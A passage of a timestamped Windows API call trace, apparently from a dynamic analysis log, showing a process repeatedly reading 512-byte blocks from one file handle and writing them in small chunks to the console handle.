lpOverlapped=0x0) returned 1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] GetFileType (hFile=0x4c) returned 0x1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] GetFileType (hFile=0x4c) returned 0x1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] GetFileType (hFile=0x4c) returned 0x1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] GetFileType (hFile=0x4c) returned 0x1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] GetFileType (hFile=0x4c) returned 0x1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] GetFileType (hFile=0x4c) returned 0x1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] GetFileType (hFile=0x4c) returned 0x1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] GetFileType (hFile=0x4c) returned 0x1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.364] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.364] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.364] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.364] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] GetFileType (hFile=0x4c) returned 0x1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] GetFileType (hFile=0x4c) returned 0x1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] GetFileType (hFile=0x4c) returned 0x1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] GetFileType (hFile=0x4c) returned 0x1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] GetFileType (hFile=0x4c) returned 0x1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] GetFileType (hFile=0x4c) returned 0x1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] GetFileType (hFile=0x4c) returned 0x1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] GetFileType (hFile=0x4c) returned 0x1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.365] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.365] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.365] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.365] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] GetFileType (hFile=0x4c) returned 0x1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] GetFileType (hFile=0x4c) returned 0x1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] GetFileType (hFile=0x4c) returned 0x1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] GetFileType (hFile=0x4c) returned 0x1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] GetFileType (hFile=0x4c) returned 0x1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] GetFileType (hFile=0x4c) returned 0x1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] GetFileType (hFile=0x4c) returned 0x1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] GetFileType (hFile=0x4c) returned 0x1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.366] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.366] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.366] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.366] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] GetFileType (hFile=0x4c) returned 0x1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] GetFileType (hFile=0x4c) returned 0x1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] GetFileType (hFile=0x4c) returned 0x1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] GetFileType (hFile=0x4c) returned 0x1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] GetFileType (hFile=0x4c) returned 0x1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] GetFileType (hFile=0x4c) returned 0x1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] GetFileType (hFile=0x4c) returned 0x1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] GetFileType (hFile=0x4c) returned 0x1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.367] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.367] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.367] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.367] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] GetFileType (hFile=0x4c) returned 0x1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] GetFileType (hFile=0x4c) returned 0x1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] GetFileType (hFile=0x4c) returned 0x1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] GetFileType (hFile=0x4c) returned 0x1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] GetFileType (hFile=0x4c) returned 0x1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] GetFileType (hFile=0x4c) returned 0x1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] GetFileType (hFile=0x4c) returned 0x1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] GetFileType (hFile=0x4c) returned 0x1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.368] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.368] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.368] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.368] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] GetFileType (hFile=0x4c) returned 0x1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] GetFileType (hFile=0x4c) returned 0x1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] GetFileType (hFile=0x4c) returned 0x1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] GetFileType (hFile=0x4c) returned 0x1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] GetFileType (hFile=0x4c) returned 0x1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] GetFileType (hFile=0x4c) returned 0x1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] GetFileType (hFile=0x4c) returned 0x1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] GetFileType (hFile=0x4c) returned 0x1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.370] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.370] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.370] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.370] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] GetFileType (hFile=0x4c) returned 0x1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] GetFileType (hFile=0x4c) returned 0x1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] GetFileType (hFile=0x4c) returned 0x1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] GetFileType (hFile=0x4c) returned 0x1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] GetFileType (hFile=0x4c) returned 0x1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] GetFileType (hFile=0x4c) returned 0x1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] GetFileType (hFile=0x4c) returned 0x1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] GetFileType (hFile=0x4c) returned 0x1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.371] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.371] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.371] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.371] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] GetFileType (hFile=0x4c) returned 0x1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] GetFileType (hFile=0x4c) returned 0x1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] GetFileType (hFile=0x4c) returned 0x1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, 